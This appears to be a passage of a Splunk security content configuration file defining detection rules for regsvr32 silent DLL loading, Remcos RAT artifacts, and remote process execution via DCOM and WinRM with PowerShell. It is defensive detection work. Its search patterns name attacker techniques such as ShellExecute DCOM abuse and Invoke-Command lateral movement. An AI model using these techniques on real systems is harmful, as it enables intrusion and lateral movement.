schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_regsvr32` AND Processes.process="*/i*" by Processes.dest Processes.parent_process Processes.process Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | where match(process,"(?i)[\-|\/][Ss]{1}") | `regsvr32_silent_and_install_param_dll_loading_filter` [ESCU - Regsvr32 with Known Silent Switch Cmdline - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies Regsvr32.exe utilizing the silent switch to load DLLs. This technique has most recently been seen in IcedID campaigns to load its initial dll that will download the 2nd stage loader that will download and decrypt the config payload. The switch type may be either a hyphen `-` or forward slash `/`. This behavior is typically found with `-s`, and it is possible there are more switch types that may be used. \ During triage, review parallel processes and capture any artifacts that may have landed on disk. Isolate and contain the endpoint as necessary. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.010"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies Regsvr32.exe utilizing the silent switch to load DLLs. This technique has most recently been seen in IcedID campaigns to load its initial dll that will download the 2nd stage loader that will download and decrypt the config payload. The switch type may be either a hyphen `-` or forward slash `/`. This behavior is typically found with `-s`, and it is possible there are more switch types that may be used. \ During triage, review parallel processes and capture any artifacts that may have landed on disk. Isolate and contain the endpoint as necessary. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = minimal. but network operator can use this application to load dll. action.escu.creation_date = 2021-07-27 action.escu.modification_date = 2021-07-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Regsvr32 with Known Silent Switch Cmdline - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["IcedID", "Suspicious Regsvr32 Activity", "Remcos", "Living Off The Land", "Qakbot", "AsyncRAT"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to load a DLL using the silent parameter. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 56}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Regsvr32 with Known Silent Switch Cmdline - Rule action.correlationsearch.annotations = {"analytic_story": ["IcedID", "Suspicious Regsvr32 Activity", "Remcos", "Living Off The Land", "Qakbot", "AsyncRAT"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.010"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_regsvr32` by Processes.user Processes.process_name Processes.process Processes.parent_process_name Processes.original_file_name Processes.dest Processes.process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | where match(process,"(?i)[\-|\/][Ss]{1}") | `regsvr32_with_known_silent_switch_cmdline_filter` [ESCU - Remcos client registry install entry - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects the presence of a registry key related to the Remcos RAT agent on a host. This detection is made by a Splunk query to search for instances where the registry key "license" is found in the "Software\Remcos" path. This analytic combines information from two data models: Endpoint.Processes and Endpoint.Registry and retrieves process information such as user, process ID, process name, process path, destination, parent process name, parent process, and process GUID. This analytic also retrieves registry information such as registry path, registry key name, registry value name, registry value data, and process GUID. By joining the process GUID from the Endpoint.Processes data model with the process GUID from the Endpoint.Registry data model, the analytic identifies instances where the "license" registry key is found in the "Software\Remcos" path. This detection is important because it suggests that the host has been compromised by the Remcos RAT agent. Remcos is a well-known remote access Trojan that can be used by attackers to gain unauthorized access to systems and exfiltrate sensitive data. Identifying this behavior allows the SOC to take immediate action to remove the RAT agent and prevent further compromise. The impact of this attack can be severe, as the attacker can gain unauthorized access to the system, steal sensitive information, or use the compromised system as a launching point for further attacks. Next steps include using this analytic in conjunction with other security measures and threat intelligence to ensure accurate detection and response. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects the presence of a registry key related to the Remcos RAT agent on a host. This detection is made by a Splunk query to search for instances where the registry key "license" is found in the "Software\Remcos" path. This analytic combines information from two data models: Endpoint.Processes and Endpoint.Registry and retrieves process information such as user, process ID, process name, process path, destination, parent process name, parent process, and process GUID. This analytic also retrieves registry information such as registry path, registry key name, registry value name, registry value data, and process GUID. By joining the process GUID from the Endpoint.Processes data model with the process GUID from the Endpoint.Registry data model, the analytic identifies instances where the "license" registry key is found in the "Software\Remcos" path. This detection is important because it suggests that the host has been compromised by the Remcos RAT agent. Remcos is a well-known remote access Trojan that can be used by attackers to gain unauthorized access to systems and exfiltrate sensitive data. Identifying this behavior allows the SOC to take immediate action to remove the RAT agent and prevent further compromise. The impact of this attack can be severe, as the attacker can gain unauthorized access to the system, steal sensitive information, or use the compromised system as a launching point for further attacks. Next steps include using this analytic in conjunction with other security measures and threat intelligence to ensure accurate detection and response. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = unknown action.escu.creation_date = 2022-11-14 action.escu.modification_date = 2022-11-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Remcos client registry install entry - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Remcos", "Windows Registry Abuse"] action.risk = 1 action.risk.param._risk_message = A registry entry $registry_path$ with registry keyname $registry_key_name$ related to Remcos RAT in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 90}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Remcos client registry install entry - Rule action.correlationsearch.annotations = {"analytic_story": ["Remcos", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 100, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1112"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects the presence of a registry key related to the Remcos RAT agent on a host. This detection is made by a Splunk query to search for instances where the registry key "license" is found in the "Software\Remcos" path. This analytic combines information from two data models: Endpoint.Processes and Endpoint.Registry and retrieves process information such as user, process ID, process name, process path, destination, parent process name, parent process, and process GUID. This analytic also retrieves registry information such as registry path, registry key name, registry value name, registry value data, and process GUID. By joining the process GUID from the Endpoint.Processes data model with the process GUID from the Endpoint.Registry data model, the analytic identifies instances where the "license" registry key is found in the "Software\Remcos" path. This detection is important because it suggests that the host has been compromised by the Remcos RAT agent. Remcos is a well-known remote access Trojan that can be used by attackers to gain unauthorized access to systems and exfiltrate sensitive data. Identifying this behavior allows the SOC to take immediate action to remove the RAT agent and prevent further compromise. The impact of this attack can be severe, as the attacker can gain unauthorized access to the system, steal sensitive information, or use the compromised system as a launching point for further attacks. Next steps include using this analytic in conjunction with other security measures and threat intelligence to ensure accurate detection and response. action.notable.param.rule_title = Remcos client registry install entry action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) AS firstTime max(_time) AS lastTime FROM datamodel=Endpoint.Processes BY _time span=1h Processes.user Processes.process_id Processes.process_name Processes.process Processes.process_path Processes.dest Processes.parent_process_name Processes.parent_process Processes.process_guid | `drop_dm_object_name(Processes)` | join process_guid [ | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_key_name=*\\Software\\Remcos*) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`] | fields firstTime lastTime dest user parent_process_name parent_process process_name process_path process registry_key_name registry_path registry_value_name registry_value_data process_guid | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` |`remcos_client_registry_install_entry_filter` [ESCU - Remcos RAT File Creation in Remcos Folder - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect file creation in remcos folder in appdata which is the keylog and clipboard logs that will be send to its c2 server. This is really a good TTP indicator that there is a remcos rat in the system that do keylogging, clipboard grabbing and audio recording. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1113"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search is to detect file creation in remcos folder in appdata which is the keylog and clipboard logs that will be send to its c2 server. This is really a good TTP indicator that there is a remcos rat in the system that do keylogging, clipboard grabbing and audio recording. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. action.escu.known_false_positives = unknown action.escu.creation_date = 2021-09-21 action.escu.modification_date = 2021-09-21 action.escu.confidence = high action.escu.full_search_name = ESCU - Remcos RAT File Creation in Remcos Folder - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Remcos"] action.risk = 1 action.risk.param._risk_message = file $file_name$ created in $file_path$ of $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 100}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Remcos RAT File Creation in Remcos Folder - Rule action.correlationsearch.annotations = {"analytic_story": ["Remcos"], "cis20": ["CIS 10"], "confidence": 100, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1113"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to detect file creation in remcos folder in appdata which is the keylog and clipboard logs that will be send to its c2 server. This is really a good TTP indicator that there is a remcos rat in the system that do keylogging, clipboard grabbing and audio recording. action.notable.param.rule_title = Remcos RAT File Creation in Remcos Folder action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = |tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_name IN ("*.dat") Filesystem.file_path = "*\\remcos\\*" by _time Filesystem.file_name Filesystem.file_path Filesystem.dest Filesystem.file_create_time | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `remcos_rat_file_creation_in_remcos_folder_filter` [ESCU - Remote Desktop Process Running On System - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search looks for the remote desktop process mstsc.exe running on systems upon which it doesn't typically run. This is accomplished by filtering out all systems that are noted in the `common_rdp_source category` in the Assets and Identity framework. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021.001", "T1021"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for the remote desktop process mstsc.exe running on systems upon which it doesn't typically run. This is accomplished by filtering out all systems that are noted in the `common_rdp_source category` in the Assets and Identity framework. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Remote Desktop may be used legitimately by users on the network. action.escu.creation_date = 2020-07-21 action.escu.modification_date = 2020-07-21 action.escu.confidence = high action.escu.full_search_name = ESCU - Remote Desktop Process Running On System - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Hidden Cobra Malware", "Active Directory Lateral Movement"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - Remote Desktop Process Running On System - Rule action.correlationsearch.annotations = {"analytic_story": ["Hidden Cobra Malware", "Active Directory Lateral Movement"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021.001", "T1021"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process=*mstsc.exe AND Processes.dest_category!=common_rdp_source by Processes.dest Processes.user Processes.process | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `drop_dm_object_name(Processes)` | `remote_desktop_process_running_on_system_filter` [ESCU - Remote Process Instantiation via DCOM and PowerShell - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `powershell.exe` with arguments utilized to start a process on a remote endpoint by abusing the DCOM protocol. Specifically, this search looks for the abuse of ShellExecute and ExecuteShellCommand. Red Teams and adversaries alike may abuse DCOM and `powershell.exe` for lateral movement and remote code execution. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021", "T1021.003"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `powershell.exe` with arguments utilized to start a process on a remote endpoint by abusing the DCOM protocol. Specifically, this search looks for the abuse of ShellExecute and ExecuteShellCommand. Red Teams and adversaries alike may abuse DCOM and `powershell.exe` for lateral movement and remote code execution. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators may leverage DCOM to start a process on remote systems, but this activity is usually limited to a small set of hosts or users. action.escu.creation_date = 2021-11-15 action.escu.modification_date = 2021-11-15 action.escu.confidence = high action.escu.full_search_name = ESCU - Remote Process Instantiation via DCOM and PowerShell - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Lateral Movement"] action.risk = 1 action.risk.param._risk_message = A process was started on a remote endpoint from $dest by abusing DCOM using PowerShell.exe action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Remote Process Instantiation via DCOM and PowerShell - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement"], "cis20": ["CIS 10"], "confidence": 70, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021", "T1021.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic looks for the execution of `powershell.exe` with arguments utilized to start a process on a remote endpoint by abusing the DCOM protocol. Specifically, this search looks for the abuse of ShellExecute and ExecuteShellCommand. Red Teams and adversaries alike may abuse DCOM and `powershell.exe` for lateral movement and remote code execution. action.notable.param.rule_title = Remote Process Instantiation via DCOM and PowerShell action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_powershell` (Processes.process="*Document.ActiveView.ExecuteShellCommand*" OR Processes.process="*Document.Application.ShellExecute*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `remote_process_instantiation_via_dcom_and_powershell_filter` [ESCU - Remote Process Instantiation via DCOM and PowerShell Script Block - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of PowerShell with arguments utilized to start a process on a remote endpoint by abusing the DCOM protocol. Specifically, this search looks for the abuse of ShellExecute and ExecuteShellCommand. Red Teams and adversaries alike may abuse DCOM for lateral movement and remote code execution. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021", "T1021.003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of PowerShell with arguments utilized to start a process on a remote endpoint by abusing the DCOM protocol. Specifically, this search looks for the abuse of ShellExecute and ExecuteShellCommand. Red Teams and adversaries alike may abuse DCOM for lateral movement and remote code execution. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup instructions can be found https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = Administrators may leverage DCOM to start a process on remote systems, but this activity is usually limited to a small set of hosts or users. action.escu.creation_date = 2022-03-22 action.escu.modification_date = 2022-03-22 action.escu.confidence = high action.escu.full_search_name = ESCU - Remote Process Instantiation via DCOM and PowerShell Script Block - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Lateral Movement"] action.risk = 1 action.risk.param._risk_message = A process was started on a remote endpoint from $Computer$ by abusing WMI using PowerShell.exe action.risk.param._risk = [{"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Remote Process Instantiation via DCOM and PowerShell Script Block - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement"], "cis20": ["CIS 10"], "confidence": 70, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021", "T1021.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of PowerShell with arguments utilized to start a process on a remote endpoint by abusing the DCOM protocol. Specifically, this search looks for the abuse of ShellExecute and ExecuteShellCommand. Red Teams and adversaries alike may abuse DCOM for lateral movement and remote code execution. action.notable.param.rule_title = Remote Process Instantiation via DCOM and PowerShell Script Block action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 (ScriptBlockText="*Document.Application.ShellExecute*" OR ScriptBlockText="*Document.ActiveView.ExecuteShellCommand*") | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer user_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `remote_process_instantiation_via_dcom_and_powershell_script_block_filter` [ESCU - Remote Process Instantiation via WinRM and PowerShell - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `powershell.exe` with arguments utilized to start a process on a remote endpoint by abusing the WinRM protocol. Specifically, this search looks for the abuse of the `Invoke-Command` commandlet. Red Teams and adversaries alike may abuse WinRM and `powershell.exe` for lateral movement and remote code execution. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021", "T1021.006"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for the execution of `powershell.exe` with arguments utilized to start a process on a remote endpoint by abusing the WinRM protocol. Specifically, this search looks for the abuse of the `Invoke-Command` commandlet. Red Teams and adversaries alike may abuse WinRM and `powershell.exe` for lateral movement and remote code execution. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators may leverage WinRM and `Invoke-Command` to start a process on remote systems for system administration or automation use cases. However, this activity is usually limited to a small set of hosts or users. action.escu.creation_date = 2021-11-16 action.escu.modification_date = 2021-11-16 action.escu.confidence = high action.escu.full_search_name = ESCU - Remote Process Instantiation via WinRM and PowerShell - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Lateral Movement"] action.risk = 1 action.risk.param._risk_message = A process was started on a remote endpoint from $dest by abusing WinRM using PowerShell.exe action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 45}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Remote Process Instantiation via WinRM and PowerShell - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement"], "cis20": ["CIS 10"], "confidence": 50, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021", "T1021.006"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic looks for the execution of `powershell.exe` with arguments utilized to start a process on a remote endpoint by abusing the WinRM protocol. Specifically, this search looks for the abuse of the `Invoke-Command` commandlet. Red Teams and adversaries alike may abuse WinRM and `powershell.exe` for lateral movement and remote code execution. action.notable.param.rule_title = Remote Process Instantiation via WinRM and PowerShell action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_powershell` (Processes.process="*Invoke-Command*" AND Processes.process="*-ComputerName*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `remote_process_instantiation_via_winrm_and_powershell_filter` [ESCU - Remote Process Instantiation via WinRM and PowerShell Script Block - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of PowerShell with arguments utilized to start a process on a remote endpoint by abusing the WinRM protocol. Specifically, this search looks for the abuse of the `Invoke-Command` commandlet. Red Teams and adversaries alike may abuse WinRM for lateral movement and remote code execution. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021", "T1021.006"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of PowerShell with arguments utilized to start a process on a remote endpoint by abusing the WinRM protocol. Specifically, this search looks for the abuse of the `Invoke-Command` commandlet. Red Teams and adversaries alike may abuse WinRM for lateral movement and remote code execution. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup instructions can be found https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = Administrators may leverage WinRM and `Invoke-Command` to start a process on remote systems for system administration or automation use cases. This activity is usually limited to a small set of hosts or users. In certain environments, tuning may not be possible. action.escu.creation_date = 2022-03-22 action.escu.modification_date = 2022-03-22 action.escu.confidence = high action.escu.full_search_name = ESCU - Remote Process Instantiation via WinRM and PowerShell Script Block - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Lateral Movement"] action.risk = 1 action.risk.param._risk_message = A process was started on a remote endpoint from $Computer$ by abusing WinRM using PowerShell.exe action.risk.param._risk = [{"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 45}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Remote Process Instantiation via WinRM and PowerShell Script Block - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement"], "cis20": ["CIS 10"], "confidence": 50, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021", "T1021.006"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of PowerShell with arguments utilized to start a process on a remote endpoint by abusing the WinRM protocol. Specifically, this search looks for the abuse of the `Invoke-Command` commandlet. Red Teams and adversaries alike may abuse WinRM for lateral movement and remote code execution. action.notable.param.rule_title = Remote Process Instantiation via WinRM and PowerShell Script Block action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 (ScriptBlockText="*Invoke-Command*" AND ScriptBlockText="*-ComputerName*") | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer user_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `remote_process_instantiation_via_winrm_and_powershell_script_block_filter` [ESCU - Remote Process Instantiation via WinRM and Winrs - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for the execution of `winrs.exe` with command-line arguments utilized to start a process on a 